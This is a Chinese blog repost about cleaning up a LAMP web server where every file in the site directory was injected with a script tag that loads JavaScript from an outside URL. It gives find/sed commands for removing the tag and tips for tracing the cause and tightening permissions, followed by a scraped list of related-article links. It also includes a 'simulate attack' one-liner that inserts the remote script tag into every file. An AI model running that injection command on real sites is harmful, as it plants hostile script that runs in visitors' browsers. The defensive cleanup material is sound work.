问题:

一个 lamp 的服务器站点目录下所有文件均被植入如下内容

<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>

包括图片文件也被植入了,网站打开时就会调用这个地址,造成的影响很恶劣。

实际解决办法:

思路是:需要遍历所有目录有文件 把以上被植入的内容删除掉。

1、  先备份数据。然后,执行命令批量修改回来。

2、  a.备份原始出问题的原始文件; b.历史备份覆盖;c.find+sed 替换;

模拟攻击

find /oldboy/ -type f|xargs sed -i '1 i <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>'

处理方法

[root@test ~]# find /oldboy -type f|xargs sed -i 's# <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g'
[root@test ~]find. -type f -exec sed -i ‘s#<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g’ {} \;
这个命令是正确的语法,点号为特殊字符,使用、来转义(数去特殊字符代表的特殊含义,使用其本身的原始意义)对于本题可以不用转义

2、查看处理结果,详细查看日志,追踪问题发生来源。

3、提供亡羊补牢的解决方案(站点目录严格权限规划方案及新上线发布范围思路)

转载于:https://www.cnblogs.com/luoahong/p/6198501.html

企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了相关推荐

  1. idea 不打开文件提示错误_解决IDEA误删out目录下的文件导致404无法访问的问题

    前言 有时候IDEA下写Web项目时可能会遇到如下问题: 误删out目录下的文件导致开启服务器后无法访问页面的问题 新增加一个页面或添加一张图片,在项目编译运行后,未能自动更新到out\artifac ...

  2. apache+php配置网站访问后,不能跳转网站首页,只显示网站目录下的文件

    apache+php配置网站访问后,不能跳转网站首页,只显示网站目录下的文件 apache的配置文件缺少配置项 修改apache2/conf/httpd.conf,找到以下配置,添加index.php ...

  3. django 引入同目录下py文件_快速开发一个简单的Django网站

    一.创建工程 1. 在cmd中输入:django-admin.py startproject projectname 2. 修改settings.py文件:在installedapp中增加需要创建的应 ...

  4. 误修改/etc目录下所有文件权限导致无法远程访问

    注意:本人环境为centos,如果是ubuntu等其他系统,则下面第1步骤可能有些文件报不存在的错误,不过不影响后面的步骤 修复步骤: 1.先用控制台登录,敲下如下命令恢复远程访问 chmod o=' ...

  5. 瑞星09年第一季度安全报告:8亿网民遭木马攻击

    4月16日,瑞星公司发布<中国大陆地区2009年第一季度挂马网站安全威胁报告>(以下简称"<瑞星安全报告>"),瑞星"云安全"系统提供的 ...

  6. 网站被流量攻击了,如何解决

    最近是业务的爆发期,很多找到我想做防御的网站业务基本上都面临着一个问题,服务器商那边发来通知,服务器被流量攻击了,这个只要超过机器的一个阈值就会造成马上封机进黑洞的后果,从而造成业务上的影响,今天我就 ...

  7. 网站遭到恶意攻击有什么危害

    1.网站访问速度很慢. 知道CC攻击的原因就不难看出,CC攻击后会导致网站访问速度异常缓慢,哪怕真实的用户访问量很少,打开速度也很慢. 2.被搜索引擎K站,排名消失. 网站长时间被CC攻击,会导致网站 ...

  8. 还服务器网站被k,导致网站被K的主要原因,看看你有没有中招!

    对于站长来说,Z担心的一个问题就是网站被k,如果网站被k就会影响到网站的权重和排名,有时候我们稍微不注意或者操作失误网站导致网站被k了,那么导致网站被k的主要原因是什么呢?云无限团队总结出了以下几点: ...

  9. php网站后,Thinkphp网站缓存导致网站迁移搬家后访问首页白屏

    Thinkphp作为一个最原始的开源php框架,很多网站建立程序员选择使用这个框架开发,快速的开发项目.不过随着更多开源程序的出现,还有涉及各个领域的海量模板,现在是很多客户使用了其它的建站程序建站, ...

最新文章

  1. set RowCount 与 top n
  2. springboot token_Springboot接口幂等性基于token实现方案
  3. python中2d_【IT专家】如何在Python中复制一个2D数组?(复制)
  4. c语言程序设计修改题,2006年秋季C语言程序设计》期末考试题A卷答案答案--修改后.doc...
  5. qt程序卡死 linux,QtCreator中打开.ui文件时卡死崩溃的解决方法
  6. Spring系列(九):Spring属性赋值注解@Value 用法介绍
  7. android 上下数字滚动_原来PPT数字还有这么高大上的展示方式
  8. 多线程的实现方式_一文搞懂Java多线程使用方式、实现原理以及常见面试题
  9. 三种方式读取项目属性文件
  10. intellij自动补全变量名和变量属性
  11. 如何删除pdf中计算机属性,从 PDF 中删除敏感内容
  12. 《TCP/IP详解 卷1:协议》PDF分享
  13. 达梦数据库备份还原使用
  14. 近日,百度《互联网从业人员单身情况调查报告》新鲜出炉,调查人群是日前火了一把的西二旗互联网从业者(转载)
  15. 如何用手机连接无线网络
  16. 未来的计算机博士就业前景_恐怖博士:电视的未来
  17. 招商银行笔试题之跳格子游戏
  18. ffmpeg+nginx+dash调用摄像头直播
  19. 用C#实现一个简易的软件光栅化渲染器
  20. 计算机与汽车智能信息化管理,谈计算机控制系统在汽车行业的应用

热门文章

  1. Java从入门到精通——数据库篇Mongo DB GridFS文件系统
  2. WPF窗体最小化到任务栏
  3. delphi 的一些备忘
  4. navicat 批量插入 测试数据
  5. Android 路由实践(二)
  6. 学习实践 - 收藏集 - 掘金
  7. Linux 终端下 dstat 监控工具
  8. PostgreSQL的 initdb 源代码分析之二十一
  9. [导入]基于Web的B/S结构实时监控系统[转]
  10. mac终端操作文件或文件夹(持续更新)